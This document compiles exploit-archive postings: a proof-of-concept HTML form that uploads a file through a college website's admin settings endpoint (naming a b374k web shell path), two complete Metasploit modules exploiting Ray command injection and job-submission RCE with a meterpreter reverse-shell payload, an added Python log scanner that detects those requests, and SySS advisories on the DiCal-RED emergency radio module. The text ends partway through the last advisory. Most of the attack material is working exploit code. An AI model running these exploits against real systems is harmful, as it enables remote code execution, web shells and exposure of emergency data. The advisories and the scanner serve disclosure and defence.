<pre><code>=============================================================================================================================================<br />| # Title : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Fr(Pro) / browser : Mozilla Firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Part 01 : about-us.php<br /><br />[+] This payload injects code of your choice into the database via Froala, a WYSIWYG editor (version 4.2.1).<br /><br />[+] Line 109 : Send the form data using fetch API (set your target URL)<br /><br />[+] Save the payload as poc.html<br /><br />[+] payload : <br /><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Settings Management</title><br /> <!-- Froala Editor CSS --><br /> <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet"><br /> <!-- Bootstrap CSS --><br /> <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"><br /> <style><br /> /* Custom Styles */<br /> #cimg {<br /> max-width: 100%;<br /> height: auto;<br /> }<br /> #preloader2 {<br /> position: fixed;<br /> top: 0;<br /> left: 0;<br /> width: 100%;<br /> height: 100%;<br /> background: rgba(0, 0, 0, 0.5);<br /> display: flex;<br /> justify-content: center;<br /> align-items: center;<br /> z-index: 9999;<br /> }<br /> .form-group {<br /> margin-bottom: 1rem;<br /> }<br /> .form-group label {<br /> display: block;<br /> 
margin-bottom: .5rem;<br /> }<br /> .form-group input, .form-group textarea {<br /> width: 100%;<br /> padding: .5rem;<br /> box-sizing: border-box;<br /> }<br /> </style><br /></head><br /><br /><body><br /> <div class="container"><br /> <form id="manage-settings" method="post" enctype="multipart/form-data"><br /> <div class="form-group"><br /> <label for="name"> Name</label><br /> <input type="text" id="name" name="name" required><br /> </div><br /> <div class="form-group"><br /> <label for="email">Email</label><br /> <input type="email" id="email" name="email" required><br /> </div><br /> <div class="form-group"><br /> <label for="contact">Contact</label><br /> <input type="tel" id="contact" name="contact" required><br /><br /> <div class="form-group"><br /> <label for="about">About Content</label><br /> <textarea class="text-jqte" id="about" name="about_us"></textarea><br /> </div><br /> <div class="form-group"><br /> <label for="img">Cover Image</label><br /> <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)"><br /> <img id="cimg" src="" alt="Selected Image Preview"><br /> </div><br /> <button type="submit" class="btn btn-primary">Save Settings</button><br /> </form><br /> </div><br /><br /> <br /> <div class="modal fade" id="viewer_modal" role='dialog'><br /> <div class="modal-dialog modal-md" role="document"><br /> <div class="modal-content"><br /> <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button><br /> <img src="" alt=""><br /> </div><br /> </div><br /> </div><br /><br /> <!-- jQuery --><br /> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><br /> <!-- Froala Editor JS --><br /> <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script><br /> <!-- Bootstrap JS (for modals) --><br /> <script 
src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script><br /><br /> <script><br /> function displayImg(input, _this) {<br /> if (input.files && input.files[0]) {<br /> var reader = new FileReader();<br /> reader.onload = function (e) {<br /> $('#cimg').attr('src', e.target.result);<br /> }<br /> reader.readAsDataURL(input.files[0]);<br /> }<br /> }<br /><br /> $(document).ready(function () {<br /> const editorInstance = new FroalaEditor('.text-jqte');<br /> });<br /><br /> $('#manage-settings').submit(function (e) {<br /> e.preventDefault();<br /> start_load();<br /> $.ajax({<br /> url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',<br /> data: new FormData($(this)[0]),<br /> cache: false,<br /> contentType: false,<br /> processData: false,<br /> method: 'POST',<br /> type: 'POST',<br /> error: err => {<br /> console.log(err);<br /> },<br /> success: function (resp) {<br /> if (resp == 1) {<br /> alert_toast('Data successfully saved.', 'success');<br /> setTimeout(function () {<br /> location.reload();<br /> }, 1000);<br /> }<br /> }<br /> });<br /> });<br /><br /> window.start_load = function () {<br /> $('body').prepend('<div id="preloader2"></div>');<br /> }<br /><br /> window.end_load = function () {<br /> $('#preloader2').fadeOut('fast', function () {<br /> $(this).remove();<br /> });<br /> }<br /><br /> window.viewer_modal = function ($src = '') {<br /> start_load();<br /> var t = $src.split('.');<br /> t = t[1];<br /> if (t == 'mp4') {<br /> var view = $("<video src='" + $src + "' controls autoplay></video>");<br /> } else {<br /> var view = $("<img src='" + $src + "' />");<br /> }<br /> $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();<br /> $('#viewer_modal .modal-content').append(view);<br /> $('#viewer_modal').modal({<br /> show: true,<br /> backdrop: 'static',<br /> keyboard: false,<br /> focus: true<br /> });<br /> end_load();<br /> }<br /><br /> 
window.uni_modal = function ($title = '', $url = '', $size = "") {<br /> start_load();<br /> $.ajax({<br /> url: $url,<br /> error: err => {<br /> console.log(err);<br /> alert("An error occurred");<br /> },<br /> success: function (resp) {<br /> if (resp) {<br /> $('#uni_modal .modal-title').html($title);<br /> $('#uni_modal .modal-body').html(resp);<br /> if ($size != '') {<br /> $('#uni_modal .modal-dialog').addClass($size);<br /> } else {<br /> $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");<br /> }<br /> $('#uni_modal').modal({<br /> show: true,<br /> backdrop: 'static',<br /> keyboard: false,<br /> focus: true<br /> });<br /> end_load();<br /> }<br /> }<br /> });<br /> }<br /><br /> window._conf = function ($msg = '', $func = '', $params = []) {<br /> $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");<br /> $('#confirm_modal .modal-body').html($msg);<br /> $('#confirm_modal').modal('show');<br /> }<br /><br /> window.alert_toast = function ($msg = 'TEST', $bg = 'success') {<br /> $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');<br /><br /> if ($bg == 'success')<br /> $('#alert_toast').addClass('bg-success');<br /> if ($bg == 'danger')<br /> $('#alert_toast').addClass('bg-danger');<br /> if ($bg == 'info')<br /> $('#alert_toast').addClass('bg-info');<br /> if ($bg == 'warning')<br /> $('#alert_toast').addClass('bg-warning');<br /><br /> $('#alert_toast .toast-body').html($msg);<br /> $('#alert_toast').toast({ delay: 3000 }).toast('show');<br /> }<br /> </script><br /></body><br /><br /></html><br /><br />[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ray cpu_profile command injection',<br /> 'Description' => %q{<br /> Ray RCE via cpu_profile command injection vulnerability.<br /> },<br /> 'Author' => [<br /> 'sierrabearchell', # Vulnerability discovery<br /> 'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module<br /> 'Takahiro Yokoyama' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2023-6019'],<br /> ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'],<br /> ],<br /> 'CmdStagerFlavor' => %i[wget],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'Platform' => %w[linux],<br /> 'Targets' => [<br /> [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],<br /> [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],<br /> [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],<br /> [<br /> 'Linux Command', {<br /> 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_COMMAND' => 'WGET'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-11-15',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8265),<br /> ]<br /> )<br /> end<br /><br /> def 
get_nodes<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'nodes?view=summary')<br /> })<br /> return unless res && res.code == 200<br /><br /> JSON.parse(res.body)<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api/version')<br /> })<br /> return Exploit::CheckCode::Unknown unless res && res.code == 200<br /><br /> ray_version = res.get_json_document['ray_version']<br /><br /> return Exploit::CheckCode::Unknown unless ray_version<br /><br /> ray_version = Rex::Version.new(ray_version)<br /> return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= ray_version && ray_version <= Rex::Version.new('2.6.3')<br /><br /> @nodes = get_nodes<br /> return Exploit::CheckCode::Vulnerable unless @nodes.nil?<br /><br /> Exploit::CheckCode::Appears<br /> end<br /><br /> def exploit<br /> # We need to pass valid node info to /worker/cpu_profile for the server to process the request<br /> # First we list all nodes and grab the pid and ip of the first one (could be any)<br /> @nodes ||= get_nodes<br /> fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes<br /> first_node = @nodes['data']['summary'].first<br /> fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid')<br /> pid = first_node['agent']['pid']<br /> fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip')<br /> ip = first_node['ip']<br /> print_good("Grabbed node info, pid: #{pid}, ip: #{ip}")<br /> case target['Type']<br /> when :nix_cmd<br /> execute_command(payload.encoded, { pid: pid, ip: ip })<br /> else<br /> execute_cmdstager({ flavor: :wget, pid: pid, ip: ip })<br /> end<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'),<br /> 'vars_get' => {<br /> 
'pid' => opts[:pid],<br /> 'ip' => opts[:ip],<br /> 'duration' => 5,<br /> 'native' => 0,<br /> 'format' => "`#{cmd}`"<br /> }<br /> })<br /> end<br /><br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ray Agent Job RCE',<br /> 'Description' => %q{<br /> RCE in Ray via the agent job submission endpoint.<br /> This is intended functionality as Ray's main purpose is executing arbitrary workloads.<br /> By default Ray has no authentication.<br /> },<br /> 'Author' => [<br /> 'sierrabearchell', # Vulnerability discovery<br /> 'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module<br /> 'Takahiro Yokoyama' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2023-48022'],<br /> ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'],<br /> ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/']<br /> ],<br /> 'CmdStagerFlavor' => %i[wget],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'Platform' => %w[linux],<br /> 'Targets' => [<br /> [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],<br /> [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],<br /> [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],<br /> [<br /> 'Linux Command', {<br /> 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_COMMAND' => 'WGET',<br /> 'MeterpreterTryToFork' => true<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-11-15',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, 
],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8265),<br /> ]<br /> )<br /> end<br /><br /> def get_job_data(cmd)<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'api/jobs/'),<br /> 'data' => { 'entrypoint' => cmd }.to_json<br /> })<br /> unless res && res.code == 200<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'),<br /> 'data' => { 'entrypoint' => cmd }.to_json<br /> })<br /> end<br /> return unless res && res.code == 200<br /><br /> JSON.parse(res.body)<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api/version')<br /> })<br /> return Exploit::CheckCode::Unknown unless res && res.code == 200<br /><br /> ray_version = res.get_json_document['ray_version']<br /><br /> return Exploit::CheckCode::Unknown unless ray_version<br /><br /> return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')<br /><br /> @job_data = get_job_data('ls')<br /> return Exploit::CheckCode::Vulnerable unless @job_data.nil?<br /><br /> Exploit::CheckCode::Appears<br /> end<br /><br /> def exploit<br /> @job_data ||= get_job_data('ls')<br /> if @job_data<br /> print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'")<br /> end<br /> case target['Type']<br /> when :nix_cmd<br /> execute_command(payload.encoded)<br /> else<br /> execute_cmdstager({ flavor: :wget })<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> get_job_data(cmd)<br /> end<br /><br />end<br /></code></pre>
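<p>Added example, not part of either Metasploit module above and not Ray's own code: a small Python scanner that flags, in a Ray dashboard's HTTP access log, the two request patterns the modules rely on, namely <code>/worker/cpu_profile</code> requests whose <code>format</code> parameter carries shell metacharacters (CVE-2023-6019) and POSTs to <code>/api/jobs/</code> or <code>/api/job_agent/jobs/</code> from hosts that are not approved job submitters (CVE-2023-48022), plus helpers that mirror the version windows the modules' <code>check</code> methods use. The log layout, hosts, timestamps and allowlist are constructed for the example.</p>

```python
import re
from typing import Dict, FrozenSet, Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that never belong in cpu_profile's 'format' parameter;
# the first module above smuggles a command into it between backticks.
SHELL_META = re.compile(r"[`;|&$<>(){}]")

# Job-submission endpoints the second module posts to. The 'entrypoint' it sends
# is run as a shell command by design, so any POST here from a host that is not
# an approved submitter deserves an alert.
JOB_ENDPOINTS = ("/api/jobs/", "/api/job_agent/jobs/")

# NCSA combined-log layout (assumed for this example).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access-log line into its fields, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def classify(entry: Dict[str, str],
             trusted_submitters: FrozenSet[str] = frozenset()) -> Optional[Dict[str, str]]:
    """Return a finding for a suspicious entry, or None for benign traffic."""
    parts = urlsplit(entry["target"])
    if parts.path.endswith("/worker/cpu_profile"):
        fmt = parse_qs(parts.query).get("format", [""])[0]  # parse_qs percent-decodes
        if SHELL_META.search(fmt):
            return {"rule": "cpu_profile_shell_metachars", "cve": "CVE-2023-6019",
                    "src": entry["src"], "ts": entry["ts"], "evidence": fmt}
    if (entry["method"] == "POST" and parts.path.endswith(JOB_ENDPOINTS)
            and entry["src"] not in trusted_submitters):
        return {"rule": "job_submission_from_untrusted_host", "cve": "CVE-2023-48022",
                "src": entry["src"], "ts": entry["ts"], "evidence": parts.path}
    return None


def scan(lines: Iterable[str],
         trusted_submitters: FrozenSet[str] = frozenset()) -> List[Dict[str, str]]:
    """Run classify() over every parseable line and collect the findings in order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry, trusted_submitters)
        if finding:
            findings.append(finding)
    return findings


def _version_tuple(version: str) -> Optional[Tuple[int, int, int]]:
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    return (int(match[1]), int(match[2]), int(match[3])) if match else None


def cpu_profile_in_module_range(version: str) -> bool:
    """Same window the first module's check() uses: 2.2.0 <= ray_version <= 2.6.3."""
    v = _version_tuple(version)
    return v is not None and (2, 2, 0) <= v <= (2, 6, 3)


def job_submission_in_module_range(version: str) -> bool:
    """Same window the second module's check() uses: ray_version <= 2.6.3."""
    v = _version_tuple(version)
    return v is not None and v <= (2, 6, 3)


# Constructed sample traffic: a benign profile request, one with a backtick-wrapped
# placeholder in 'format', one job POST from an unknown host and one from an approved host.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Nov/2023:10:00:01 +0000] "GET /nodes?view=summary HTTP/1.1" 200 512',
    '10.0.0.7 - - [15/Nov/2023:10:00:02 +0000] "GET /worker/cpu_profile?pid=4242&ip=10.0.0.7'
    '&duration=5&native=0&format=flamegraph HTTP/1.1" 200 2048',
    '10.0.0.5 - - [15/Nov/2023:10:00:03 +0000] "GET /worker/cpu_profile?pid=4242&ip=10.0.0.5'
    '&duration=5&native=0&format=%60CMD_PLACEHOLDER%60 HTTP/1.1" 200 17',
    '198.51.100.9 - - [15/Nov/2023:10:00:04 +0000] "POST /api/jobs/ HTTP/1.1" 200 88',
    '10.0.0.2 - - [15/Nov/2023:10:00:05 +0000] "POST /api/job_agent/jobs/ HTTP/1.1" 200 88',
    '10.0.0.9 - - [15/Nov/2023:10:00:06 +0000] "GET /api/version HTTP/1.1" 200 40',
]
TRUSTED_SUBMITTERS = frozenset({"10.0.0.2"})  # constructed allowlist of job schedulers

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, TRUSTED_SUBMITTERS):
        print(f'{f["ts"]} {f["src"]} {f["cve"]} {f["rule"]}: {f["evidence"]}')
```

Access logs do not carry request bodies, so the job-submission rule keys on source host rather than on the <code>entrypoint</code> string; pair it with the version helpers when triaging which dashboards need isolating.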
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-042<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36441<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to missing authentication checks, the device is vulnerable to the<br />disclosure of sensitive information.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device provides a network server on TCP port 2101. 
This service does not<br />seem to process any input, but it regularly sends data to connected clients.<br />This includes operation messages when they are processed by the device.<br />An unauthenticated attacker can therefore gain information about current<br />emergency situations and possibly also emergency vehicle positions or routes.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />$ telnet <IP or hostname> 2101<br />[Wait ...]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-042<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-042.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br 
/>Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-040<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Improper Authentication (CWE-287)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36444<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. 
This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to improper authentication checks, the device is vulnerable to<br />unauthorized access to logs and other files on the device's file system.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device allows viewing log files via the administrative web interface.<br />This function does not require an authenticated session.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />As other parts of the administrative web interface do require authentication,<br />a simple proof of concept is to log in to the web interface and navigate to<br />the function to view log files.<br />Log file contents are returned by a URL similar to<br />http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22%22,%22FileAlias%22:%22FdmDebugPath%22,%22LinesMax%22:0}<br /><br />Using a local proxy to remove the QSESSIONID cookie from this request shows<br />that the content is also returned when not sending any session information.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br 
/>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-040<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-040.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-039<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36442<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. 
